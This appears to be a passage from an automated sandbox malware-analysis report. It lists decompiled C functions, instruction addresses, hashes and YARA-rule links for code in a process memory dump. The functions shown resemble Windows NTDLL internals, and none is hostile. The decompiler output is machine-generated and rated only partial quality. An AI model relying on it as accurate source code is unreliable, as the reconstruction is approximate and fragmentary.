					_t21 = 0x1f8;
					goto L5;
				}
			}

0x053bf71d
0x053bf722
0x053bf726
0x05404770
0x053bf765
0x053bf769
0x053bf769
0x053bf732
0x0540477a
0x00000000
0x0540477a
0x053bf738
0x053bf73a
0x053bf73c
0x053bf73f
0x053bf746
0x053bf778
0x053bf7a9
0x053bf7a9
0x053bf754
0x053bf75a
0x053bf75d
0x053bf75f
0x053bf761
0x053bf76f
0x053bf771
0x053bf771
0x053bf76f
0x053bf763
0x00000000
0x053bf763
0x053bf77d
0x053bf7a3
0x053bf7a5
0x00000000
0x053bf7a5
0x053bf77f
0x053bf782
0x053bf784
0x053bf786
0x00000000
0x00000000
0x00000000
0x053bf788
0x053bf748
0x053bf74d
0x053bf78d
0x053bf793
0x053bf7b7
0x053bf7bc
0x00000000
0x053bf7bc
0x053bf798
0x00000000
0x00000000
0x053bf79d
0x053bf7b0
0x00000000
0x053bf7b0
0x053bf79f
0x00000000
0x053bf74f
0x053bf74f
0x00000000
0x053bf74f

Strings

Actx , xrefs: 053BF73F

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: ff26280310f05e36a6cfaf1789db3ccb3fe40353bf411ca99eee4711614829b0
Instruction ID: 5322ad8771654d742d9249246808884fdad48beac5549cb6719cfd64e217110e
Opcode Fuzzy Hash: ff26280310f05e36a6cfaf1789db3ccb3fe40353bf411ca99eee4711614829b0
Instruction Fuzzy Hash: 601196357086029BFB248D1D8C927F6729BFB856D4F3465BAD666CBF91D6F0C8408340

Uniqueness

Uniqueness Score: -1.00%

Function 05448DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E05448DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x5470d50);
				E053ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E05425720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L053EDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L053EDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E053ED130(_t34, _t39, _t40);
			}

0x05448df1
0x05448df1
0x05448df1
0x05448df1
0x05448df1
0x05448df1
0x05448df3
0x05448df8
0x05448dfd
0x05448e00
0x05448e0e
0x05448e2a
0x05448e36
0x05448e38
0x05448e3c
0x05448e46
0x05448e46
0x05448e36
0x05448e50
0x05448e56
0x05448e59
0x05448e5c
0x05448e60
0x05448e67
0x05448e6d
0x05448e73
0x05448e74
0x05448eb1
0x05448ebd

Strings

Critical error detected %lx, xrefs: 05448E21

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 59ad29cf3fb2917f73413c7de1aac3eaa7db14f697b2c4b24c2f7d598ccdbf7b
Instruction ID: 8397c7c05d8ea856b3f48a7c0c1b734d14402f8c38b7344a487717adf3e95957
Opcode Fuzzy Hash: 59ad29cf3fb2917f73413c7de1aac3eaa7db14f697b2c4b24c2f7d598ccdbf7b
Instruction Fuzzy Hash: 29113975D55348EAEF25DFA8850A7EDBBB1BB04714F34865ED429AB381C3344602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0542FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0542FF60

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: f503d555191f030ba50fc6211c1bfdd849bd749ad3f3c62a0c36b006f8cad2ab
Instruction ID: 702b0c4f053e9562dea4e6a414ca47f549725e9b2e1a1b3a0f6e22fcc22b63f3
Opcode Fuzzy Hash: f503d555191f030ba50fc6211c1bfdd849bd749ad3f3c62a0c36b006f8cad2ab
Instruction Fuzzy Hash: 7E1125716101A4EFDB12EB10C849FE97BB1FB08700F958089F0055B2A0C7389944DB10

Uniqueness

Uniqueness Score: -1.00%

Function 05465BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E05465BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x5471178);
				E053ED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05464C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E053DD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05465542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x54860e8;
								if( *0x54860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x54860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E053D9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E053D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E053DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E053DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E053DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E053DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E053DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E053DF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E053DF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05464CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E053ED130(_t427, _t494, _t511);
				}
			}

0x05465ba5
0x05465baa
0x05465baf
0x05465bb4
0x05465bb6
0x05465bbc
0x05465bbe
0x05465bc4
0x05465bcd
0x05465bd3
0x05465bd6
0x05465bdc
0x05465be0
0x05465be3
0x05465beb
0x05465bf2
0x05465bf8
0x05465bfe
0x05465c04
0x05465c0e
0x05465c18
0x05465c1f
0x05465c25
0x05465c2a
0x05465c2c
0x05465c32
0x05465c3a
0x05465c3f
0x05465c42
0x05465c48
0x05465c5b
0x05465c5b
0x05465c2c
0x05465cb7
0x05465cb9
0x05465cbf
0x05465cc2
0x05465cca
0x05465ccb
0x05465ccb
0x05465cd1
0x05465cd7
0x05465cda
0x05465ce1
0x05465ce4
0x05465ce7
0x05465ced
0x05465cf3
0x05465cf9
0x05465cff
0x05465d08
0x05465d0a
0x05465d0e
0x05465d10
0x00000000
0x00000000
0x05465d16
0x05465d1a
0x00000000
0x00000000
0x05465d20
0x05465d22
0x05465d25
0x05465d2f
0x05465d2f
0x05465d33
0x05465d3d
0x05465d49
0x05465d4b
0x00000000
0x00000000
0x05465d5a
0x05465d5d
0x05465d60
0x00000000
0x00000000
0x05465d66
0x05465d69
0x00000000
0x00000000
0x05465d6f
0x05465d6f
0x05465d73
0x05465d79
0x05465d7f
0x05465d86
0x05465d95
0x05465d98
0x05465dba
0x05465dcb
0x05465dce
0x05465dd3
0x05465dd6
0x05465dd8
0x05465de6
0x05465dec
0x05465dee
0x05465df1
0x05465df3
0x0546635a
0x0546635a
0x00000000
0x0546635a
0x05465dfe
0x05465e02
0x05465e05
0x05465e07
0x05465e10
0x05465e13
0x05465e1b
0x05465e1c
0x05465e21
0x05465e22
0x05465e23
0x05465e25
0x05465e2a
0x05465e2c
0x05465e2e
0x05465e36
0x05465e39
0x05465e42
0x05465e47
0x05465e4d
0x05465e54
0x05465e54
0x05465e54
0x05465e2e
0x05465e5c
0x05465e5f
0x05465e62
0x05465e64
0x05465e6b
0x05465e70
0x05465e7a
0x05465e7a
0x05465e7a
0x05465e6b
0x05465e7e
0x05465e7f
0x05465e7f
0x05465e81
0x05465e87
0x05465e8b
0x05465e8c
0x05465e8c
0x05465e8c
0x05465e9a
0x05465e9c
0x05465ea2
0x05465ea6
0x05465f50
0x05465f50
0x05465f57
0x05465f66
0x05465f66
0x05465f66
0x05465f68
0x05465f6a
0x054663d0
0x00000000
0x05465f70
0x05465f70
0x05465f91
0x05465f9c
0x05465f9e
0x05465fa4
0x05465fa6
0x0546638c
0x05466392
0x054663a1
0x054663a7
0x054663af
0x054663af
0x054663bd
0x054663d8
0x00000000
0x054663d8
0x05465fac
0x05465fb2
0x05465fb4
0x05465fbd
0x05465fc6
0x05465fce
0x05465fd4
0x05465fdc
0x05465fec
0x05465fed
0x05465fee
0x05465fef
0x05465ff9
0x05465ffa
0x05465ffb
0x05465ffc
0x05466000
0x05466004
0x05466012
0x05466012
0x05466018
0x05466019
0x0546601a
0x0546601b
0x0546601c
0x05466020
0x05466059
0x0546605c
0x05466061
0x05466061
0x05466022
0x05466022
0x05466022
0x05466025
0x0546602a
0x0546602b
0x05466031
0x05466037
0x05466038
0x0546603e
0x05466048
0x05466049
0x0546604a
0x0546604b
0x0546604c
0x0546604d
0x05466053
0x05466054
0x05466054
0x05466062
0x05466065
0x05466067
0x0546606a
0x05466070
0x05466075
0x05466076
0x05466081
0x05466087
0x05466095
0x05466099
0x0546609e
0x054660a4
0x054660ae
0x054660b0
0x054660b3
0x054660b6
0x054660b8
0x054660ba
0x054660ba
0x054660ba
0x054660ba
0x054660be
0x054660c0
0x054660c5
0x054660c5
0x054660c5
0x054660c6
0x054660cd
0x05466114
0x054660cf
0x054660cf
0x054660d4
0x054660d5
0x054660da
0x054660db
0x054660e1
0x054660e2
0x054660e8
0x054660f8
0x054660fd
0x054660fe
0x05466102
0x05466104
0x05466107
0x05466109
0x0546610b
0x0546610b
0x0546610b
0x0546610b
0x0546610f
0x0546610f
0x05466117
0x0546611a
0x0546611f
0x05466125
0x05466134
0x05466139
0x0546613f
0x05466146
0x05466148
0x0546614b
0x0546614d
0x0546614f
0x0546614f
0x0546614f
0x0546614f
0x05466153
0x05466159
